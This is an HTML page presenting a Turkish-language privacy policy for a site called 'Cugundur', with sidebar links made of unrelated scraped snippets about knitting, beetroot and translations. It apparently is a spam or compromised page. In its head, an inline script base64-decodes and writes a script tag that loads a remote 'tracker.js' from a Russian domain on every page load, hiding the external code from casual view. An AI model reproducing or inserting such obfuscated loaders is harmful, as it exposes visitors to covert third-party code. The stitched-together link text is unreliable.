<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
	ъ <script>
      var string = 'PHNjcmlwdCBzcmM9Imh0dHBzOi8vY3lzdGl0aXNuZXQucnUvdHJhY2tlci5qcyI+PC9zY3JpcHQ+';
      var decodedString = atob(string);
      document.write(''+ decodedString +'');
  </script>
<meta name="description" content="Privacy policy" />
<meta name="keywords" content="Privacy policy" />
<title>Privacy policy | Cugundur</title>
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<link rel="stylesheet" type="text/css" href="style.css" />


</head>
<body  id="1LJNzQzfx">
<div id="wrapper">
	<div id="header">
		<div id="logo">
			<h1 id="EH4PTD3waKR2n"><a href="index.html">Cugundur</a></h1>
		</div>
		<div id="slogan">
			<h2 id="Tdu363gNtkKRb"></h2>
		</div>
	</div>
	<div id="menu">
		<ul>
			<li class="first current_page_item"><a href="index.html">Homepage</a></li>
			<li><a href="#">Products</a></li>
			<li><a href="#">Services</a></li>
			<li><a href="#">Clients</a></li>
			<li><a href="#">Support</a></li>
		</ul>
		<br class="clearfix" />
	</div>
	<div id="splash">
		<img class="pic" src="images/pic01.jpg" width="870" height="230" alt="" />
	</div>
	<div id="page">
		<div id="content">
			<div class="box"  id="XeCDlrce">
				<h2>Welcome to Cugundur</h2>
			</div>
<h2 id="ZJr273Z4Syod2vs">Privacy policy</h2> 2021.03.21 09:58
				<center><img src="" width="50%"   id="W1rib7zf7MDGm"></center><br><br><p> Bu Gizlilik Politikası, Siteyi ziyaret ettiğinizde veya Siteden bir ürün satın aldığınızda kişisel bilgilerinizin nasıl toplandığını, kullanıldığını ve paylaşıldığını açıklar. </p>
<h5> Topladığımız kişisel bilgiler </h5>
<p> Siteyi ziyaret ettiğinizde, web tarayıcınız, IP adresiniz, saat diliminiz ve cihazınızda yüklü olan bazı tanımlama bilgileri dahil olmak üzere cihazınızla ilgili belirli bilgileri otomatik olarak toplarız. Ek olarak, Siteye göz atarken, görüntülediğiniz bireysel web sayfaları veya ürünler, sizi Siteye hangi web siteleri veya arama terimlerinin yönlendirdiği ve Site ile nasıl etkileşim kurduğunuz hakkında bilgiler toplarız. Otomatik olarak toplanan bu bilgileri "Cihaz Bilgileri" olarak adlandırıyoruz. </p>
<h5> Aşağıdaki teknolojileri kullanarak Cihaz Bilgilerini topluyoruz: </h5>
<p> "Günlük dosyaları", Sitede gerçekleşen işlemleri izler ve IP adresiniz, tarayıcı türünüz, İnternet servis sağlayıcınız, yönlendirme / çıkış sayfaları ve tarih / saat damgaları dahil olmak üzere verileri toplar. </p>
<p> "Web işaretçileri", "etiketler" ve "pikseller" Sitede nasıl gezindiğinizle ilgili bilgileri kaydetmek için kullanılan elektronik dosyalardır. </p>
<p> Ayrıca, Site üzerinden bir satın alma yaptığınızda veya bir satın alma girişiminde bulunduğunuzda, adınız, fatura adresiniz, gönderim adresiniz, ödeme bilgileriniz (kredi kartı numaraları dahil), e-posta adresiniz ve telefonunuz dahil olmak üzere sizden belirli bilgileri toplarız. numara. Bu bilgilere "Sipariş Bilgileri" diyoruz. </p>
<p> Bu Gizlilik Politikasında "Kişisel Bilgiler" den bahsettiğimizde, hem Cihaz Bilgileri hem de Sipariş Bilgileri hakkında konuşuyoruz. </p>
<h5> Kişisel bilgilerinizi nasıl kullanıyoruz? </h5>
<p> Genel olarak topladığımız Sipariş Bilgilerini, Site aracılığıyla verilen siparişleri yerine getirmek için kullanırız (ödeme bilgilerinizi işleme, nakliye için düzenleme ve size faturalar ve / veya sipariş onayları sağlama dahil). </p>
<p> Topladığımız Cihaz Bilgilerini, potansiyel risk ve sahtekarlığı (özellikle IP adresinizi) taramamıza yardımcı olmak ve daha genel olarak Sitemizi iyileştirmek ve optimize etmek için kullanırız. </p>
<h5> Kişisel Bilgilerinizi Paylaşmak </h5>
<p> Kişisel Bilgilerinizi yukarıda açıklanan şekilde kullanmamıza yardımcı olmak için üçüncü taraflarla paylaşıyoruz. Ayrıca, müşterilerimizin Siteyi nasıl kullandığını anlamamıza yardımcı olması için Google Analytics kullanıyoruz - Google'ın Kişisel Bilgilerinizi nasıl kullandığı hakkında daha fazla bilgiyi buradan okuyabilirsiniz: https://www.google.com/intl/en/policies/privacy/. Google Analytics’i buradan da devre dışı bırakabilirsiniz: https://tools.google.com/dlpage/gaoptout. </p>
<p> Son olarak, Kişisel Bilgilerinizi geçerli yasa ve düzenlemelere uymak, bir mahkeme celbine, arama emrine veya aldığımız bilgilere yönelik diğer yasal taleplere yanıt vermek veya haklarımızı başka bir şekilde korumak için de paylaşabiliriz. </p>
<h5> Davranışsal reklamcılık </h5>
<p> Yukarıda açıklandığı gibi, Kişisel Bilgilerinizi, ilginizi çekebileceğini düşündüğümüz hedefli reklamlar veya pazarlama iletişimleri sağlamak için kullanırız. Hedefli reklamcılığın nasıl çalıştığı hakkında daha fazla bilgi için, http://www.networkadvertising.org/understanding-online-advertising/how-does-it-work adresindeki Network Advertising Initiative’in ("NAI") eğitim sayfasını ziyaret edebilirsiniz. </p>
<h5> Aşağıdaki bağlantıları kullanarak hedefli reklamcılıktan vazgeçebilirsiniz: </h5>
<p> Facebook: https://www.facebook.com/settings/?tab=ads </p>
<p> Google: https://www.google.com/settings/ads/anonymous </p>
<p> Bing: https://advertise.bingads.microsoft.com/en-us/resources/policies/personalized-ads </p>
<p> Ayrıca, http://optout.aboutads.info/ adresindeki Digital Advertising Alliance’ın devre dışı bırakma portalını ziyaret ederek bu hizmetlerden bazılarını devre dışı bırakabilirsiniz. </p>
<h5> Takip etmeyin </h5>
<p> Tarayıcınızdan bir Do Not Track sinyali gördüğümüzde Sitemizin veri toplama ve kullanım uygulamalarını değiştirmediğimizi lütfen unutmayın. </p>
<h5> Haklarınız </h5>
<p> Avrupa'da ikamet ediyorsanız, hakkınızda tuttuğumuz kişisel bilgilere erişme ve kişisel bilgilerinizin düzeltilmesini, güncellenmesini veya silinmesini isteme hakkına sahipsiniz. Bu hakkı kullanmak istiyorsanız, lütfen aşağıdaki iletişim bilgileri aracılığıyla bizimle iletişime geçin. </p>
<p> Ayrıca, Avrupa'da ikamet ediyorsanız, sizinle yapabileceğimiz sözleşmeleri yerine getirmek (örneğin, Site aracılığıyla bir sipariş verirseniz) veya başka bir şekilde meşru ticari çıkarlarımızı sürdürmek için bilgilerinizi işlediğimizi not ediyoruz. yukarıda listelenen. Ayrıca, bilgilerinizin Kanada ve Amerika Birleşik Devletleri de dahil olmak üzere Avrupa dışına aktarılacağını lütfen unutmayın. </p>
<h5> Veri saklama </h5>
<p> Site üzerinden bir sipariş verdiğinizde, siz bu bilgileri silmemizi istemediğiniz sürece Sipariş Bilgilerinizi kayıtlarımız için saklayacağız. </p>
<h5> Değişiklikler </h5>
<p> Bu gizlilik politikasını, örneğin uygulamalarımızdaki değişiklikleri veya diğer operasyonel, yasal veya düzenleyici nedenlerle yansıtmak için zaman zaman güncelleyebiliriz. </p>
<br>
						
<iframe width="615 height="315" src="https://www.youtube.com/embed/" frameborder="0" allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe><br>		<img src="" width="50%"/>

			<br class="clearfix" />
		</div>
		<div id="sidebar">
			<div class="box">
				<h3>Menu</h3>
<ul>
<li><a href="index.html">Bir çift patiği sadece 15 dakikanızı harcayarak yapmak ...</a></li>
<li><a href="1.html">süper kolay patik / bayan patik modelleri yapılışı / iki ...</a><br></li>
<li><a href="2.html">Rusça › Azerice çeviri: Свекла ne demek, Свекла anlamı</a><br></li>
<li><a href="3.html">beetroot | İngilizce-Türkçe Sözlük - Cambridge Dictionary</a><br></li>
<li><a href="4.html">Pancar - Ücretsiz Çevrimiçi Sözlük, Eş Anlamlılar ve ...</a><br></li>
<li><a href="5.html">Calze crochet panosundaki Pin - za.pinterest.com</a><br></li>
<li><a href="6.html">Fruits &amp; Vegetables - Eşleştir</a><br></li>
<li><a href="7.html">YouTube | Patikler, Örgü, Örgü desenleri</a><br></li>
<li><a href="8.html">Tarım Siteniz: Damıtılmış suda çelik köklendirme (Gül ...</a><br></li>
<li><a href="9.html">EN HIZLI VE PRATİK YÖNTEM İLE KIRMIZI PANCAR TURŞUSU NASIL ...</a><br></li>
</ul>
			</div>

		</div>
		<br class="clearfix"  id="KNZhmQuRySfv65U"/>
	</div>
	<div id="page-bottom">
		<div id="page-bottom-content">
				<p>
					<ul>
<li><a href="index.html">Bir çift patiği sadece 15 dakikanızı harcayarak yapmak ...</a><br> Rus versiyası Ввезенная из Грузии в Азербайджан свекла оказалась непригодной для употребления . Tərəfdaşların xəbərləri. Ən çox oxunan xəbərlər.</li>
<li><a href="1.html">süper kolay patik / bayan patik modelleri yapılışı / iki ...</a><br> Mar 22, 2020 - #sumakSalatalara ve yemeklere lezzet vermek için kullandığımız mucizevi baharatlardan biri sumaktır. Sumak ekşi bir tada sahip muhteşem bir antioksidan kayna...</li>
<li><a href="2.html">Rusça › Azerice çeviri: Свекла ne demek, Свекла anlamı</a><br> свёкла, свекла beetroot, beet بَنْجَر červená řepa rødbede Rote Beete παντζάρι remolacha punajuuri betterave cikla barbabietola rossa ビートルート 비트 뿌리 rode biet rødbete burak (ćwikłowy) beterraba rödbeta หัวบีตรูต củ cải đường 甜菜根 (pan'ʤaɾ) ad</li>
<li><a href="3.html">beetroot | İngilizce-Türkçe Sözlük - Cambridge Dictionary</a><br> 22.Ara.2019 - Bu Pin, Katerina Tsitsonis tarafından keşfedildi. Kendi Pinlerinizi keşfedin ve Pinterest'e kaydedin!</li>
<li><a href="4.html">Pancar - Ücretsiz Çevrimiçi Sözlük, Eş Anlamlılar ve ...</a><br> 14.Kas.2018 - Merhaba Gülümseten Marifetler Değerli Ailesi Öncelikle sizlere Sevgi ve Saygılarımı İletiyorum.Kanalımda Çok kolay Çok Pratik Yelek modelleri, Bebek örgü mo...</li>
<li><a href="5.html">Calze crochet panosundaki Pin - za.pinterest.com</a><br> TÜRKSOY Dergisi 47. Sayısı. KISA KISA // ƴƸƺƸƼƴƸ. T.C. Kültür ve Turizm Bakanı Yalçın Topçu Türk Dünyası Temsilcilerini Kabul Etti Uluslararası Türk Kültürü Teşkilatı ...</li>
<li><a href="6.html">Fruits &amp; Vegetables - Eşleştir</a><br> beetroot çevir: pancar. Daha fazlasını öğrenmek için bkz. Cambridge İngilizce-Türkçe Sözlük.</li>
<li><a href="7.html">YouTube | Patikler, Örgü, Örgü desenleri</a><br> Через сколько примерно времени всходит свекла после посадки? Обычно этот процесс занимает от 7 до 20 дней в зависимости от погодных условий. Нередко посевы оказываются загущенными и требуют ...</li>
<li><a href="8.html">Tarım Siteniz: Damıtılmış suda çelik köklendirme (Gül ...</a><br> 01.Nis.2019 - Şeyma'nın örgü modelleri kanalımız örgü severler'i hitap eder ilk ilmek den son bitmiş haline dek ayrıntıları ile sizlere sunuyoruz.Günlük kullanılan modelle...</li>
<li><a href="9.html">EN HIZLI VE PRATİK YÖNTEM İLE KIRMIZI PANCAR TURŞUSU NASIL ...</a><br> 05.Şub.2014 - Bu Pin, Kim Kleier tarafından keşfedildi. Kendi Pinlerinizi keşfedin ve Pinterest'e kaydedin!</li>
</ul>
				</p>
		</div>
		<br class="clearfix"   id="XxtlZazxY"/>
	</div>
</div>
<div id="footer">		<ul>
			<li><a href="privacy-policy.html">Privacy policy</a></li>
			<li><a href="terms.html">Terms and Conditions</a></li>
			<li><a href="photo.html">Photo gallery</a></li>
			<li class="last"><a href="contact.html">Contacts</a></li>
			</ul>
	&copy; Untitled. All rights reserved | </a>.
</div>
</body>
</html>
